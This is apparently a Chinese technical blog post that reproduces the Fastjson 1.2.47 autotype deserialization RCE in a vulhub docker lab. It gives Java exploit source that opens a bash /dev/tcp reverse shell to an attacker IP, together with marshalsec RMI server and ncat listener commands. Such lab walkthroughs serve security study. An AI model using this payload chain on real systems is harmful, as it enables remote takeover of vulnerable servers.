技術分享 | Fastjson-RCE漏洞復現
Fastjson提供autotype功能,允許使用者在反序列化資料中透過 @type 指定反序列化的型別,其次Fastjson自定義的反序列化會呼叫指定類中的setter方法和部分getter方法。
當元件開啟autotype並且反序列化不可信的資料時,攻擊者構造的資料(惡意程式碼)會進入特定類的setter或getter方法中,可能會被惡意利用。
影響版本
Fastjson1.2.47以及之前的版本
復現
1.1 環境準備
攻擊機1
用於接受反彈shell
系統:Win10 x64
安裝nc,burpsuite
win10中需安裝nc,用於監聽反彈的shell。
在win10下,在nc官網(https://eternallybored.org/misc/netcat/)下載會報毒被攔截。
可以使用nmap中重置的ncat(https://github.com/andrew-d/static-binaries/blob/master/binaries/windows/x86/ncat.exe),與nc使用無區別。
下載後進入,ncat所在目錄,執行ncat,出現如下輸出則安裝成功
攻擊機2
提供一些必要服務
系統:Ubuntu
需安裝:marshlsec ( https://github.com/mbechler/marshalsec )(用於啟動RMI服務)、python環境(用於啟動SimpleHTTPServer服務)、openjdk
marshlsec下載後,需要使用mvn打包,無mvn命令需要安裝Maven
marshlsec下載後,進入檔案目錄執行sudo mvn clean package -DskipTests,完成後會在目錄的target目錄中發現兩個jar包
受害機
系統:Ubuntu (與上述提供RMI和Web服務的機器可以是一臺或不同)
需安裝:docker、docker-composer、vulhub
1.2 示意圖
1.3 復現流程
在 攻擊機1 開啟監聽
在受害機上啟動環境,進入vulhub中的/fastjson/1.2.47-rce/,使用如下命令啟動服務:
# docker-compose up -d
在 攻擊機1 上訪問該服務,如下則為成功
構造惡意程式碼檔案vim Exploit.java,內容如下
程式碼中192.168.253.129/6666修改為攻擊機1的ip和監聽反彈shell的埠
import java.io.BufferedReader;
import java.io.InputStream;
import java.io.InputStreamReader;
public class Exploit{
public Exploit() throws Exception {
//Process p = Runtime.getRuntime().exec(new String[]{"cmd","/c","calc.exe"});
Process p = Runtime.getRuntime().exec(new String[]{"/bin/bash","-c","exec 5<>/dev/tcp/192.168.253.129/6666;cat <&5 | while read line; do $line 2>&5 >&5; done"});
InputStream is = p.getInputStream();
BufferedReader reader = new BufferedReader(new InputStreamReader(is));
String line;
while((line = reader.readLine()) != null) {
System.out.println(line);
}
p.waitFor();
is.close();
reader.close();
p.destroy();
}
public static void main(String[] args) throws Exception {
}
}編寫完成後,對該檔案進行編譯生成對應的class檔案
# javac Exploit.java
在 攻擊機2 上啟動RMI和Web服務
· 啟動Web服務# python -m SimpleHTTPServer 8080
使用 攻擊機1 訪問 攻擊機2開放的Web服務,如下則成功
啟動RMI服務
進入marshalsec打包好的jar包目錄執行命令,如下
192.168.253.138:8080 為上述Web服務地址和埠,需自行修改
8888 可為任意埠# java -cp marshalsec-0.0.3-SNAPSHOT-all.jar
marshalsec.jndi.RMIRefServer
"http://192.168.253.138:8080/#Exploit" 8888
在 攻擊機1 上構造惡意請求
傳送請求後,等待ncat獲取反彈shell,可見在惡意程式碼中構造的命令執行,成功反彈shell,可以執行命令
相關文章
- Android Binder漏洞挖掘技術與案例分享(下)Android
- Android Binder漏洞挖掘技術與案例分享(上)Android
- Apache漏洞復現Apache
- Cocos 技術派:實時競技小遊戲技術實現分享遊戲
- phpStudy poc漏洞復現以及漏洞修復辦法PHP
- web技術分享| 虛擬列表實現Web
- 【阿菜漏洞復現】DeFi 平臺 MonoX Finance 漏洞分析及復現MonoNaN
- weblogic ssrf漏洞復現Web
- Vulhub WebLogic漏洞復現Web
- 技術分享 | 一種針對PHP物件注入漏洞的新型利用方法PHP物件
- 【漏洞復現】Redis未授權訪問漏洞Redis
- Weblogic-SSRF漏洞復現Web
- nginx目錄穿越漏洞復現Nginx
- 【漏洞復現】Paraluni 安全事件分析事件
- Redis未授權漏洞復現Redis
- 技術分享| HTTP 代理HTTP
- 技術分享主幹
- 漏洞挖掘分析技術總結
- web前端技術分享:使用react實現簡易路由Web前端React路由
- 技術分享| 小程式實現音視訊通話
- 漏洞挖掘利器-Fuzz技術介紹
- 技術分享連載(六十)
- Joel 技術分享心得
- 技術選型的藝術---湖北技術價值分享會
- 【技術分享】Oracle控制檔案的備份、恢復以及多路複用Oracle
- SSLO如何實現會話保持?技術乾貨線上分享會話
- 技術分享| 如何使用Prometheus實現系統程式監控Prometheus
- web技術分享| 快速實現一個呼叫邀請 SDKWeb
- IOS技術分享| 你畫我猜小遊戲快速實現iOS遊戲
- PHP檔案包含漏洞(利用phpinfo)復現PHP
- Fastjson反序列化漏洞復現ASTJSON
- PHPMailer遠端命令執行漏洞復現PHPAI
- 常見中介軟體漏洞復現(上)
- 教你資料庫漏洞防護技術資料庫
- 美鏈BEC合約漏洞技術分析
- 技術分享:記憶體管理記憶體
- 技術分享 | AlertManager 原始碼解析原始碼
- 技術分享 | ClickHouse-Keeper 初探